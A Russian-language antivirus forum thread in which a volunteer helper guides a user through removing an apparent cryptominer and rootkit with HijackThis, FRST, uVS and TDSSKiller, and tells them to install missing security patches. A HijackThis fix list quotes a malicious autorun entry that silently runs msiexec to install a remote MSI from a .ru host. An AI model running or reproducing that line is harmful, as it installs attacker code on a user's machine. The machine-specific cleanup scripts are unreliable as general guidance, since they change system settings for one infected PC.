Показано с 1 по 20 из 20.

Загрузка графического процессора до 99% (заявка № 219079)

  1. #1
    Junior Member Репутация
    Регистрация
    27.05.2018
    Сообщений
    9
    Вес репутации
    22

    Загрузка графического процессора до 99%

    Здравствуйте. Заметил резкое повышение нагрузки на графический процессор до 99% даже если не запущено ни одно приложение. Буквально 3-4 часа назад выполнял лечение компьютера утилитой Dr.Web CureIt, была обнаружена всего лишь одна угроза, которую утилита и лечила. Запомнил только название Mysa (вряд ли конечно проблема в этом). Но в итоге ГП нагружен, но при отключении от сети Интернет возвращается в норму (0-1%). При повторном подключении к сети нагрузка возвращается на максимальный уровень. Прошу о помощи, всё-таки какими же средствами защищать свой компьютер, просто несколько лет стоял Microsoft Security Essentials и проблем не наблюдалось, буквально вот за последний месяц программа начала обнаруживать постоянно элементы категории Троян (Trojan:win32/Bitrep.A, Trojan:Win32/Tiggre!rfn).
    Вложения Вложения
    Последний раз редактировалось G-Lauf; 27.05.2018 в 15:33. Причина: Чуть не забыл об архиве из инструкции.

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Cyber Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Info_bot
    Регистрация
    11.05.2011
    Сообщений
    2,287
    Вес репутации
    378
    Уважаемый(ая) G-Lauf, спасибо за обращение на наш форум!

    Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

    information

    Информация

    Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.





    Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

  4. #3
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    35,496
    Вес репутации
    1058
    Запустите HijackThis, расположенный в папке Autologger и пофикситеWindows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора)):
    Код:
    O4 - HKLM\..\Run: [RtHDVCpl] = C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s
    O4 - HKLM\..\Run: [start1] = C:\Windows\system32\msiexec.exe /i http://js.5b6b7b.ru:280/helloworld.msi /q
    O4 - HKU\.DEFAULT\..\Run: [script_fcbd] = D:\Uplay\Far Cry 3 Blood Dragon\fcbd.bat  (file missing)
    O7 - IPSec: Name: qianye (2018/04/22) - {eae4eda0-e8dc-475b-9889-9e8e3124a1bd} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block
    O7 - IPSec: Name: qianye (2018/04/22) - {eae4eda0-e8dc-475b-9889-9e8e3124a1bd} - Source: Any IP - Destination: my IP (Port 135 UDP) (mirrored) - Action: Block
    O7 - IPSec: Name: qianye (2018/04/22) - {eae4eda0-e8dc-475b-9889-9e8e3124a1bd} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block
    O7 - IPSec: Name: qianye (2018/04/22) - {eae4eda0-e8dc-475b-9889-9e8e3124a1bd} - Source: Any IP - Destination: my IP (Port 139 UDP) (mirrored) - Action: Block
    O7 - IPSec: Name: qianye (2018/04/22) - {eae4eda0-e8dc-475b-9889-9e8e3124a1bd} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block
    O7 - IPSec: Name: qianye (2018/04/22) - {eae4eda0-e8dc-475b-9889-9e8e3124a1bd} - Source: Any IP - Destination: my IP (Port 445 UDP) (mirrored) - Action: Block
    O21 - HKLM\..\ShellIconOverlayIdentifiers: 00avg - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
    O22 - Task: \AVG\Overseer - C:\Program Files (x86)\AVG\Antivirus\setup\overseer.exe (file missing)
    Загрузите, распакуйте на Рабочий стол и запустите SecurityCheck by glax24 & Severnyj.
    Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запуск от имени администратора (если Вы используете Windows Vista/7/8/10).
    Если увидите предупреждение от фаервола относительно программы SecurityCheck, не блокируйте ее работу.
    Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt;
    Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt.

    Приложите этот файл к своему следующему сообщению.

    Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

    Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
    Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

    Нажмите кнопку Scan.
    После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
    Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).
    WBR,
    Vadim

  5. #4
    Junior Member Репутация
    Регистрация
    27.05.2018
    Сообщений
    9
    Вес репутации
    22
    Выполнил указанные инструкции. При сканировании Farbar Recovery Scan Tool вылезала ошибка, что программа не отвечает и постоянно появлялась во время проверки файлов по пути C:\Windows\system32\... на разных файлах. Решил перезагрузить компьютер и сканирование прошло полностью (может я где-то накосячил, и заранее прошу прощения). До этого перезагрузка проводилась, как по инструкции "пофиксить" после использования программы HijackThis. Ну и прикрепил полученные файлы.
    Вложения Вложения

  6. #5
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    35,496
    Вес репутации
    1058
    Откройте Блокнот (Старт =>Программы => Стандартные => Блокнот). Скопируйте в него следующий код:
    Код:
    CreateRestorePoint:
    CHR HKLM-x32\...\Chrome\Extension: [ccfifbojenkenpkmnbnndeadpfdiffof] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [fdjdjkkjoiomafnihnobkinnfjnnlhdg] - hxxp://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [oelpkepjlgmehajehfeicfbjdiobdkfj] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [ojlcebdkbpjdpiligkdbbkdkfjmchbfd] - hxxps://clients2.google.com/service/update2/crx
    Task: {3DE4467A-03D8-4412-9798-AC11251602AB} - \Mysa -> No File <==== ATTENTION
    AlternateDataStreams: C:\ProgramData\TEMP:58A5270D [147]
    CMD: sc.exe config lanmanworkstation depend= bowser/mrxsmb20/nsi
    CMD: sc.exe config mrxsmb10 start= disabled
    Reboot:
    и сохраните как fixlist.txt в папку с Farbar Recovery Scan Tool. При сохранении выберите кодировку Юникод!
    Отключите до перезагрузки антивирус, закройте все браузеры, в FRST нажмите один раз Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
    Компьютер будет перезагружен автоматически.

    В автозагрузке майнеров нет, но могут запускать удалённо через уязвимости.
    ------------------------------- [ HotFix ] --------------------------------
    HotFix KB3185911 Внимание! Скачать обновления
    HotFix KB3184122 Внимание! Скачать обновления
    HotFix KB3192391 Внимание! Скачать обновления
    HotFix KB3197867 Внимание! Скачать обновления
    HotFix KB3205394 Внимание! Скачать обновления
    HotFix KB4012212 Внимание! Скачать обновления
    HotFix KB4019263 Внимание! Скачать обновления
    HotFix KB4022722 Внимание! Скачать обновления
    HotFix KB4015546 Внимание! Скачать обновления
    HotFix KB4025337 Внимание! Скачать обновления
    HotFix KB4034679 Внимание! Скачать обновления
    HotFix KB4041678 Внимание! Скачать обновления
    HotFix KB4056894 Внимание! Скачать обновления
    HotFix KB4056897 Внимание! Скачать обновления
    HotFix KB4074587 Внимание! Скачать обновления
    HotFix KB4103712 Внимание! Скачать обновления
    Это только критические хотфиксы, включая KB4012212, который закрывает опаснейшую уязвимость, используемую в т. ч. нашумевшими в прошлом году шифровальщики WannaCry и Petya/NotPetya, а также многими майнерами.
    -------------------------------- [ Java ] ---------------------------------
    Java 8 Update 11 (64-bit) v.8.0.110 Внимание! Скачать обновления
    ^Удалите старую версию и установите новую (jre-8u172-windows-x64.exe)^
    --------------------------- [ AdobeProduction ] ---------------------------
    Adobe Flash Player 14 ActiveX v.14.0.0.145 Внимание! Скачать обновления
    Adobe Flash Player 14 Plugin v.14.0.0.145 Внимание! Скачать обновления
    Adobe Flash Player 29 PPAPI v.29.0.0.171
    ------------------------------- [ Browser ] -------------------------------
    Yandex v.18.4.0.2080 Внимание! Скачать обновления
    ^Проверьте обновления через меню Дополнительно - О браузере Yandex!^
    Это обязательно обновите.

    После всего напишите, что с проблемой.
    WBR,
    Vadim

  7. #6
    Junior Member Репутация
    Регистрация
    27.05.2018
    Сообщений
    9
    Вес репутации
    22
    Выполнил указанные инструкции. С каждым последующим HotFix-ом проблема не исчезала. Обновил программы. Проблема всё равно осталась.

  8. #7
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    35,496
    Вес репутации
    1058
    Скачайте утилиту Universal Virus Sniffer отсюда и сделайте полный образ автозапуска uVS.
    WBR,
    Vadim

  9. #8
    Junior Member Репутация
    Регистрация
    27.05.2018
    Сообщений
    9
    Вес репутации
    22
    Выполнил.
    Вложения Вложения

  10. #9
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    35,496
    Вес репутации
    1058
    Скопируйте скрипт из окна "код" ниже в буфер обмена:
    Код:
    ;uVS v4.0.12 [http://dsrt.dyndns.org]
    ;Target OS: NTv6.1
    v400c
    zoo %Sys32%\MSP3APP.DLL
    zoo %SystemDrive%\USERS\ARTEM\DOCUMENTS\DYINGLIGHT\OUT\SETTINGS\VIDEO.SCR
    delref HTTP://GO.MAIL.RU/DISTIB/EP/?Q={SEARCHTERMS}&PRODUCT_ID=%7BE919D89A-12FE-4712-859E-AEE3064FA981%7D&GP=813028
    delref %SystemDrive%\USERS\ARTEM\APPDATA\LOCAL\MAIL.RU\GAMECENTER\NPDETECTOR.DLL
    delall %Sys32%\MSP3APP.DLL
    delref %SystemRoot%\SYSWOW64\MACROMED\FLASH\FLASHUTIL32_29_0_0_113_PEPPER.EXE
    delref %SystemRoot%\SOFTWAREDISTRIBUTION\DOWNLOAD\EDA49536108FC0020BA221A9881FFFD4\00942A724BD51F569570E9D44404907E356313CF
    delref %SystemRoot%\SOFTWAREDISTRIBUTION\DOWNLOAD\BDFA46C8AD2CC96499A2530BD24082AB\0251B87C98B871F795CCA7FA43B2FD478540CA66
    delref %SystemRoot%\SOFTWAREDISTRIBUTION\DOWNLOAD\01A3F4D5BE12C25FF81BA7633B2ED8FB\0570A552A847C122826EE08B261A3561BA9E6FAA
    delref %SystemRoot%\SOFTWAREDISTRIBUTION\DOWNLOAD\3B46F771CB2AB991C8B3122D11003FBA\105D2E5AD6942A8A0DC61ED2BD248D53E7F11C6D
    delref %SystemRoot%\SOFTWAREDISTRIBUTION\DOWNLOAD\26EFCBF02C61CB3D27C0C77A5FC36A7D\23E609A1595C31CCA25C2CAD915A3CC914AE5E23
    delref %SystemRoot%\SOFTWAREDISTRIBUTION\DOWNLOAD\85636E507B8A23E93A8D7EB6453B45A3\5C2CD0206749D57D5BC4B3CF7AB66459E39E46C5
    delref %SystemRoot%\SOFTWAREDISTRIBUTION\DOWNLOAD\04E5828CCB1A772960DB8AE59BAB3784\72E04C11A26BBEB972FDF0BF60C0D97E9CDDBCAF
    delref %SystemRoot%\SOFTWAREDISTRIBUTION\DOWNLOAD\5A2C48BE7B3C6F4A2E5BF724C31CED97\812E2C8F11756791A194BDEE228A4808D0DCE5C3
    delref %SystemRoot%\SOFTWAREDISTRIBUTION\DOWNLOAD\6AAD72615E385C33A3045E3964E3B7D6\AF55F0FAB92E2FEA2100397ABF2E81BBA64900BB
    delref %SystemRoot%\SOFTWAREDISTRIBUTION\DOWNLOAD\7F3CF46E78916B257436AF1A9423A322\B2E8E612599F54646186E992DCD1BE6FDE6C73FE
    delref WMI_.[FUCKYOUMM2_FILTER]
    del %SystemDrive%\USERS\ARTEM\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\THE ELDER SCROLLS ONLINE\UNINSTALL THE ELDER SCROLLS ONLINE.LNK
    czoo
    apply
    deltmp
    restart
    Закройте все броузеры, запустите командный файл script.cmd из папки с uVS. Когда откроется окно со скриптом, нажмите "Выполнить".
    Компьютер перезагрузится.

    В папке с uVS появится архив ZIP с именем, начинающимся с ZOO_ и далее из даты и времени, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.

    В папке с UVS будет лог выполнения скрипта, текстовый файл с именем из даты и времени выполнения, прикрепите его с своему сообщению.
    WBR,
    Vadim

  11. #10
    Junior Member Репутация
    Регистрация
    27.05.2018
    Сообщений
    9
    Вес репутации
    22
    Скопировал скрипт. Закрыл браузер. Запустил файл script. Вылезает предупреждение системы безопасности о том что не даётся проверить издателя, нажимаю запустить и на долю секунды появляется окно командной строки и тут же исчезает. Перезагрузка компьютера не происходит.

  12. #11
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    35,496
    Вес репутации
    1058
    Тогда так.

    Скопируйте скрипт в буфер обмена.
    Запустите файл start.exe из папки с uVS, выберите "Запустить под текущим пользователем", в главном меню программы - Скрипты -> выполнить скрипт из буфера обмена.
    Компьютер перезагрузится.

    В папке с uVS появится архив ZIP с именем, начинающимся с ZOO_ и далее из даты и времени, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.

    В папке с UVS будет лог выполнения скрипта, текстовый файл с именем из даты и времени выполнения, прикрепите его с своему сообщению.
    WBR,
    Vadim

  13. #12
    Junior Member Репутация
    Регистрация
    27.05.2018
    Сообщений
    9
    Вес репутации
    22
    Вроде получилось. И, кстати, да, во время активации скприпта вылезло окно на подтверждение удаления svchost, но в скобках было написано что само приложение не удалится. Просто самостоятельно, наблюдая за процессами в диспетчере задач, я заметил что с момента подключения к сети, именно этот процесс активируется и тут же подскакивает нагрузка на ГП.
    Вложения Вложения

  14. #13
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    35,496
    Вес репутации
    1058
    Скачайте и запустите TDSSKiller: http://support.kaspersky.ru/viruses/disinfection/5350.
    Файл C:\TDSSKiller.***_log.txt приложите в теме.
    (где *** - версия программы, дата и время запуска.)
    WBR,
    Vadim

  15. #14
    Junior Member Репутация
    Регистрация
    27.05.2018
    Сообщений
    9
    Вес репутации
    22
    Прошу прощения, быть может я что-то не так сделал. Но по пути C:\TDSSKiller лежит папка C:\TDSSKiller_Quarantine\ уже непосредственно с папкой под названием времени и даты проведения и другими файлами. И, кстати, не знаю как и почему, но деятельность ГП в простое пришла в норму, примерно в 19:20 (МСК). Никаких дополнительных проверок или действий не совершал, при этом процесс на который у меня были все подозрения присутствовал. Но сейчас после проверки TDSS и перезагрузки его нет. Я в недоумении.

  16. #15
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    35,496
    Вес репутации
    1058
    Это Вы карантин прикрепили, его в открытый доступ нельзя, в карантин по ссылке соответствующей загрузите.
    А я просил ещё лог, он в корне диска C: - текстовый файл.
    TDSSKiller руткит удалил, всё по плану.
    WBR,
    Vadim

  17. #16
    Junior Member Репутация
    Регистрация
    27.05.2018
    Сообщений
    9
    Вес репутации
    22
    Прошу прощения, запутался. Я ещё немного запутался с вложениями. Превышен доступный объём присылаемых вложений. В меню управления вложениями не могу понять как удалить некоторые.

  18. #17
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    35,496
    Вес репутации
    1058
    Удалите вложения.
    Упакуйте с помощью WinRar в архив с максимальным сжатием, может влезет.
    Загрузите в доступное облачное хранилище или на файлообменник (rghost.ru, например) и дайте ссылку в теме.

    Аж 3 варианта
    WBR,
    Vadim

  19. #18
    Junior Member Репутация
    Регистрация
    27.05.2018
    Сообщений
    9
    Вес репутации
    22
    Прошу прощения за задержку. Выслал лог из корня диска C:
    Вложения Вложения

  20. #19
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    35,496
    Вес репутации
    1058
    Всё, увидел, что хотел, порядок.
    Проблема не возвращалась?
    WBR,
    Vadim

  21. #20
    Cybernetic Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    29.12.2008
    Сообщений
    48,233
    Вес репутации
    977

    Итог лечения

    Статистика проведенного лечения:
    • Получено карантинов: 1
    • Обработано файлов: 3
    • В ходе лечения вредоносные программы в карантинах не обнаружены


  • Уважаемый(ая) G-Lauf, наши специалисты оказали Вам всю возможную помощь по вашему обращению.

    В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:

     

     

    Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:

     

     

    Anti-Malware VK

     

    Anti-Malware Telegram

     

     

    Надеемся больше никогда не увидеть ваш компьютер зараженным!

     

    Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.

  • Похожие темы

    1. Ответов: 11
      Последнее сообщение: 13.08.2017, 19:19
    2. Ответов: 5
      Последнее сообщение: 14.05.2017, 21:49
    3. Ответов: 2
      Последнее сообщение: 26.08.2016, 07:27
    4. Ответов: 7
      Последнее сообщение: 30.10.2015, 20:14
    5. Загрузка графического процессора 99%
      От mishahaha в разделе Помогите!
      Ответов: 6
      Последнее сообщение: 22.03.2015, 21:45

    Метки для этой темы

    Свернуть/Развернуть Ваши права в разделе

    • Вы не можете создавать новые темы
    • Вы не можете отвечать в темах
    • Вы не можете прикреплять вложения
    • Вы не можете редактировать свои сообщения
    •  
    Page generated in 0.01478 seconds with 18 queries